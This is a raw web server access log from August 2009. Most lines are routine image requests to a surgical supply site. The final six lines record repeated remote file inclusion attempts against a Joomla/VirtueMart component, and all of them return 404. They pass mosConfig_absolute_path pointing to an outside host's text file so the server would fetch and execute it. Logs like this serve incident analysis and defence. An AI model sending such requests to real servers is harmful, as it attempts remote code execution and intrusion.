119.152.13.212 - - [03/Aug/2009:03:00:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
119.152.13.212 - - [03/Aug/2009:03:00:43 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
119.152.13.212 - - [03/Aug/2009:03:00:43 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
119.152.13.212 - - [03/Aug/2009:03:00:50 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11932A482FC5E700CDD3067+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
119.152.13.212 - - [03/Aug/2009:03:00:50 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11932A482FC5E700CDD3067+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
190.144.44.36 - - [03/Aug/2009:03:00:51 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:00:51 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:00:51 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:00:56 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:01:01 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
190.144.44.36 - - [03/Aug/2009:03:01:01 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
